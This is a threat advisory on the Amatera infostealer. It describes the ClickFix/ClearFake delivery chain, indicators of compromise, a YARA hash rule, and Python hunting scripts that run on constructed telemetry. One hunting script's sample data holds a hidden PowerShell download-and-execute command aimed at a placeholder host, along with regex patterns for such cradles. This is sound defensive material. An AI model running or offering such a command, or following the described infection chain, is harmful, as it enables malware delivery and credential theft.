Amatera Stealer Launches Sophisticated Multi-Stage Attacks via ClearFake

Threat Type: Infostealer malware (Malware-as-a-Service)
Exploited Vulnerabilities: CVE-2024-21412 (Windows SmartScreen bypass). The current delivery chain otherwise needs no software vulnerability: it relies on user execution via ClearFake site injects and ClickFix, with loader scripts served through EtherHiding.
Malware Used: Amatera Stealer (formerly ACR Stealer)
Threat Score: 🔴 High (8.0/10) – Evasive, persistent, dynamically updated MaaS platform with novel C2 and shellcode tactics.
Last Threat Observation: June 19, 2025
Overview
Amatera Stealer is the rebranded continuation of ACR Stealer, now sold and operated as a Malware-as-a-Service by the Russian-speaking threat actor SheldIO. It has dropped the Dead Drop Resolver infrastructure that made ACR easy to track and instead communicates through NTSockets (direct NT system calls to the AFD driver that sidestep Winsock and WinHTTP). Delivery has moved to ClearFake website injects, EtherHiding (loader JavaScript stored in smart contracts), and the ClickFix social-engineering lure.
This advisory incorporates threat intelligence published in mid-June 2025, which shows Amatera in a new operational phase: low-level evasion, C2 channels that bypass the user-mode networking APIs (and the hooks security products place on them), obfuscated multi-stage PowerShell chains, and broad abuse of decentralized infrastructure. A growing set of anti-analysis techniques and a steady update cadence further raise its risk profile.
Key Details
Delivery Method: ClearFake website injects (with EtherHiding smart contracts), ClickFix (user execution via fake CAPTCHA + Run box + PowerShell)
Target: Finance, enterprise, crypto wallet users, remote workers
Functions:
- Credential theft (browsers, password managers)
- Crypto wallet exfiltration
- Sensitive document capture (.docx, .xlsx, .pdf)
- Shellcode injection (Early Bird, Context Hijack)
- Secondary payload delivery (.exe, .ps1, .dll)
Obfuscation and evasion: Base64/XOR encoding, PowerShell + MSBuild chain, AMSI/ETW bypass, WoW64 syscalls, CDN abuse, dynamic API resolution
Attack Vectors
Amatera is spread primarily through compromised websites carrying the ClearFake JavaScript framework. With EtherHiding, the next-stage JavaScript is stored in a smart contract on BNB Smart Chain (formerly Binance Smart Chain) and retrieved at page load by the injected script, so the operator can change the payload without touching the compromised site again.
Victims are shown a fake update or CAPTCHA prompt (ClickFix) that instructs them to paste a pre-copied PowerShell command into the Run dialog (Win+R). That command uses Invoke-RestMethod (irm) to download an MSBuild project (.csproj) file and runs it with msbuild.exe, which compiles and executes the embedded code in memory. This stage is a shellcode loader: it starts a legitimate process in a suspended state and hijacks it (Early Bird APC injection or thread-context hijacking) so that Amatera runs entirely in memory.
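The chain above leaves a recognisable parent/child and command-line footprint in process-creation telemetry. The following is an added detection example written for this advisory, not code from Proofpoint or from the Amatera operator: it scores Sysmon Event ID 1 style records (reduced to pid, ppid, image, cmdline) for the explorer.exe → powershell.exe (irm + iex) → msbuild.exe (.csproj in a user-writable directory) pattern. The sample records, hostnames and paths are constructed for the example and are not IoCs.

```python
"""Hunt for the ClickFix -> PowerShell -> MSBuild chain in process telemetry.

Added example for the advisory; the EVENTS below are constructed records in
the shape of Sysmon Event ID 1 (ProcessCreate), not real observations.
"""
import re

# Constructed sample telemetry. The Win+R Run dialog launches its command as
# a child of explorer.exe, which is why the ClickFix PowerShell stage has
# that parent. example.invalid is a placeholder, not a real host.
EVENTS = [
    {"pid": 4100, "ppid": 1200, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 5312, "ppid": 4100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iex (irm https://example.invalid/verify)"'},
    {"pid": 5480, "ppid": 5312,
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmdline": r"MSBuild.exe C:\Users\user\AppData\Local\Temp\x.csproj"},
    # Benign build automation for contrast: no cradle, project under C:\src.
    {"pid": 6000, "ppid": 3000,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -File C:\\Scripts\\backup.ps1"},
    {"pid": 6100, "ppid": 6000,
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmdline": r"MSBuild.exe C:\src\app\app.csproj /t:Build"},
]

CRADLE = re.compile(r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b", re.I)
EXEC = re.compile(r"\b(iex|invoke-expression)\b", re.I)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I)
USER_WRITABLE = re.compile(r"\\(temp|appdata|downloads|public|programdata)\\", re.I)
POWERSHELL = ("powershell.exe", "pwsh.exe")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def own_indicators(ev, by_pid):
    """Weighted indicators for one process, judged on its own command line
    and its immediate parent."""
    reasons = []
    name = basename(ev["image"])
    parent = by_pid.get(ev["ppid"])
    pname = basename(parent["image"]) if parent else ""
    cmd = ev["cmdline"]
    if name in POWERSHELL:
        if CRADLE.search(cmd) and EXEC.search(cmd):
            reasons.append((2, "PowerShell download-and-execute cradle (irm/iwr + iex)"))
        if HIDDEN.search(cmd):
            reasons.append((1, "PowerShell hidden window"))
        if pname == "explorer.exe":
            reasons.append((1, "PowerShell started from explorer.exe (Run box / ClickFix pattern)"))
    if name == "msbuild.exe":
        if pname in POWERSHELL:
            reasons.append((1, "MSBuild spawned by PowerShell"))
        if ".csproj" in cmd.lower() and USER_WRITABLE.search(cmd):
            reasons.append((2, "MSBuild project file in a user-writable directory"))
    return reasons


def chain_score(pid, by_pid, depth=4):
    """Sum indicators up the ancestry so the MSBuild stage inherits the
    suspicion of the PowerShell stage that spawned it."""
    total, reasons, seen = 0, [], set()
    while pid in by_pid and depth > 0 and pid not in seen:
        seen.add(pid)
        ev = by_pid[pid]
        for weight, reason in own_indicators(ev, by_pid):
            total += weight
            reasons.append(f"pid {pid}: {reason}")
        pid, depth = ev["ppid"], depth - 1
    return total, reasons


def hunt(events, threshold=3):
    """Return {pid: (score, reasons)} for processes whose chain meets the threshold."""
    by_pid = {e["pid"]: e for e in events}
    findings = {}
    for ev in events:
        score, reasons = chain_score(ev["pid"], by_pid)
        if score >= threshold:
            findings[ev["pid"]] = (score, reasons)
    return findings


if __name__ == "__main__":
    for pid, (score, reasons) in hunt(EVENTS).items():
        print(f"pid {pid} score {score}")
        for r in reasons:
            print("  -", r)
```

Only the two processes in the ClickFix chain clear the threshold (the PowerShell stage on its own, and the MSBuild stage with the PowerShell indicators inherited); the backup script that legitimately calls MSBuild scores 1 and is not reported. The weights are a starting point for tuning against your own baseline, not a calibrated model.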
Known Indicators of Compromise (IoCs)
MD5 Hashes
- 1b4a67d5fc078f87ab5574c970c297f4
SHA1 Hashes
- da9825ec812af43e4177c25b0fc98917a1e5fd99
SHA256 Hashes
- 055a883f18ffcc413973fa45383e72e998aae87909af5f9507b6384bfec34a5b
- 120316ecaf06b76a564ce42e11f7074c52df6d79b85d3526c5b4e9f362d2f1c2
- 2960d5f8a3d9b0a21d6b744092fe3089517ecf2e49169683f754bfe9800e3991
- 35eb93548a0c037d392f870c05e0e9fb1aeff3a5a505e1d4a087f7465ed1f6af
- 7d91a585583f4aa1a3ab3cb808d7bc351d6140b3ae1deeef9d51c6414c11baea
- ad9ffd624e27070092ff18a10e33fa9e2784b2c75ac9ac4540fa81cf5bd84e55
Domains
- amaprox[.]icu
- badnesspandemic[.]shop
- overplanteasiest[.]top
Hostnames
- b1[.]talismanoverblown[.]com
- cv[.]cbrw[.]ru
- tt[.]cbrw[.]ru
YARA Rule (Hashes)
import "hash"

rule Detect_Amatera_Known_Hashes
{
    meta:
        description = "Detect files matching the Amatera Stealer hashes listed in this advisory"
        author = "Blair Little"
        date = "2025-06-18"
        version = "1.1"

    condition:
        hash.md5(0, filesize) == "1b4a67d5fc078f87ab5574c970c297f4" or
        hash.sha1(0, filesize) == "da9825ec812af43e4177c25b0fc98917a1e5fd99" or
        hash.sha256(0, filesize) == "055a883f18ffcc413973fa45383e72e998aae87909af5f9507b6384bfec34a5b" or
        hash.sha256(0, filesize) == "120316ecaf06b76a564ce42e11f7074c52df6d79b85d3526c5b4e9f362d2f1c2" or
        hash.sha256(0, filesize) == "2960d5f8a3d9b0a21d6b744092fe3089517ecf2e49169683f754bfe9800e3991" or
        hash.sha256(0, filesize) == "35eb93548a0c037d392f870c05e0e9fb1aeff3a5a505e1d4a087f7465ed1f6af" or
        hash.sha256(0, filesize) == "7d91a585583f4aa1a3ab3cb808d7bc351d6140b3ae1deeef9d51c6414c11baea" or
        hash.sha256(0, filesize) == "ad9ffd624e27070092ff18a10e33fa9e2784b2c75ac9ac4540fa81cf5bd84e55"
}
The hash module digests the whole file on every scan, so this rule suits retro-hunting a file collection or quarantine store rather than inline endpoint scanning. Because the MaaS operator ships updated builds frequently, new samples will not match these hashes; pair the rule with the behavioral detections below.
Mitigation and Prevention
User Awareness:
- Train users to avoid cracked software
- Educate on ClickFix: never paste a command into the Run box (Win+R) or a terminal because a website asked for it
- Warn about fake CAPTCHA/updates on legitimate-looking sites
Email and Web Filtering:
- Block or rewrite links to known ClearFake-compromised sites and to the domains listed above
- Flag links to newly registered domains on the TLDs seen in this campaign (.icu, .shop, .top)
Antivirus Protection:
- Use EDRs with behavior-based detection
- Monitor for msbuild activity, PowerShell with irm/IEX, direct memory injection
Two-Factor Authentication (2FA):
- Require MFA on cloud services and admin portals
Monitor Logs:
- Log msbuild.exe execution (especially when spawned by PowerShell with a project file in a user-writable directory) and outbound connections to CDN IP ranges where the HTTP Host header does not match the destination
- Use EDR telemetry to spot processes that open \Device\Afd\Endpoint directly (NTSockets) without having loaded ws2_32.dll; standard Windows event logging does not record this
Regular Updates:
- Apply patches for CVE-2024-21412
- Keep SmartScreen, MSC file handling (MMC), and Windows Script Host fully patched
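The two log-monitoring items above are easier to act on with concrete logic. The following is an added hunting example written for this advisory (not Proofpoint's or the operator's code) that runs over constructed per-process EDR telemetry: loaded modules, NT object paths opened through NtCreateFile, and outbound HTTP request metadata as a TLS-inspecting proxy would record it. It flags a process that reaches \Device\Afd\Endpoint without Winsock loaded (the NTSockets footprint; treated here as a heuristic, since some native services may legitimately do this) and HTTP requests whose Host header is on this advisory's domain list or disagrees with the TLS SNI. The process names, IPs (TEST-NET ranges) and the cdn.example.net SNI are placeholders.

```python
"""Hunt for NTSockets-style networking and spoofed Host headers.

Added example for the advisory. PROCESSES is constructed telemetry in the
shape an EDR could export; it is not a real capture.
"""

# Domains from the advisory's IoC list (the only non-placeholder values here).
IOC_DOMAINS = {
    "amaprox.icu", "badnesspandemic.shop", "overplanteasiest.top",
    "b1.talismanoverblown.com", "cv.cbrw.ru", "tt.cbrw.ru",
}
AFD_ENDPOINT = r"\Device\Afd\Endpoint"
WINSOCK_MODULES = {"ws2_32.dll", "mswsock.dll"}

PROCESSES = {
    # A browser: opens AFD endpoints, but through Winsock, with a Host that
    # matches its SNI.
    "chrome.exe (pid 3300)": {
        "modules": ["ntdll.dll", "kernel32.dll", "ws2_32.dll", "mswsock.dll"],
        "nt_opens": [AFD_ENDPOINT],
        "http": [{"dst_ip": "203.0.113.10", "host": "www.example.com",
                  "sni": "www.example.com"}],
    },
    # A hijacked host process: raw NT calls to AFD, no Winsock loaded, and a
    # request to a CDN edge with the C2 domain forced into the Host header.
    "svchost.exe (pid 7120)": {
        "modules": ["ntdll.dll", "kernel32.dll"],
        "nt_opens": [AFD_ENDPOINT],
        "http": [{"dst_ip": "198.51.100.7", "host": "amaprox.icu",
                  "sni": "cdn.example.net"}],
    },
    "notepad.exe (pid 8000)": {
        "modules": ["ntdll.dll", "kernel32.dll"], "nt_opens": [], "http": [],
    },
}


def matches_ioc(host, iocs=IOC_DOMAINS):
    """True if host is an IoC domain or a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in iocs)


def afd_without_winsock(proc):
    """NTSockets heuristic: AFD endpoint opened by a process that never
    loaded the Winsock stack that normally talks to it."""
    loaded = {m.lower() for m in proc["modules"]}
    opened_afd = any(p.lower() == AFD_ENDPOINT.lower() for p in proc["nt_opens"])
    return opened_afd and not (loaded & WINSOCK_MODULES)


def host_header_findings(proc):
    reasons = []
    for req in proc["http"]:
        host, sni = req["host"].lower(), (req.get("sni") or "").lower()
        if matches_ioc(host):
            reasons.append(f"HTTP Host {host} is on the IoC domain list (dst {req['dst_ip']})")
        if sni and sni != host:
            reasons.append(f"HTTP Host {host} does not match TLS SNI {sni} (dst {req['dst_ip']})")
    return reasons


def hunt(processes):
    """Return {process: [reasons]} for every process with at least one finding."""
    findings = {}
    for name, proc in processes.items():
        reasons = []
        if afd_without_winsock(proc):
            reasons.append(r"opened \Device\Afd\Endpoint without ws2_32.dll/mswsock.dll loaded")
        reasons.extend(host_header_findings(proc))
        if reasons:
            findings[name] = reasons
    return findings


if __name__ == "__main__":
    for name, reasons in hunt(PROCESSES).items():
        print(name)
        for r in reasons:
            print("  -", r)
```

The Host/SNI comparison only works where the proxy sees the decrypted request or the traffic is plain HTTP; for opaque TLS, the AFD-without-Winsock check and the destination IP are what remain. A hit on the Winsock heuristic alone deserves a memory capture of the process, since the injected payload will not be on disk.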
Risk Assessment
Amatera Stealer poses an ongoing, high-level threat. Decentralized payload hosting (EtherHiding), an evasive C2 channel (NTSockets, CDN IPs with spoofed Host headers), and user-assisted execution (ClickFix) together defeat signature-based and API-hook-based controls. Security teams should rely on memory forensics, behavior-based analytics, and rich endpoint telemetry rather than on file hashes and domain lists alone.
Conclusion
Amatera Stealer’s trajectory shows a strong commitment to innovation by its operator SheldIO. As defenses adapt, so does the malware—evolving from Dead Drop Resolvers to direct syscalls and blockchain hosting. Only layered, adaptive defense postures can counter this increasingly sophisticated infostealer. Organizations are urged to adopt threat hunting strategies that identify early-stage PowerShell usage, monitor for signs of ClearFake campaigns, and maintain strong cyber hygiene across all endpoints.
Sources:
- Proofpoint – Amatera Stealer: Rebranded ACR Stealer With Improved Evasion, Sophistication
- IBM X-Force Exchange – Amatera Stealer: Rebranded ACR Stealer With Improved Evasion, Sophistication
- AlienVault OTX – Indicators of Compromise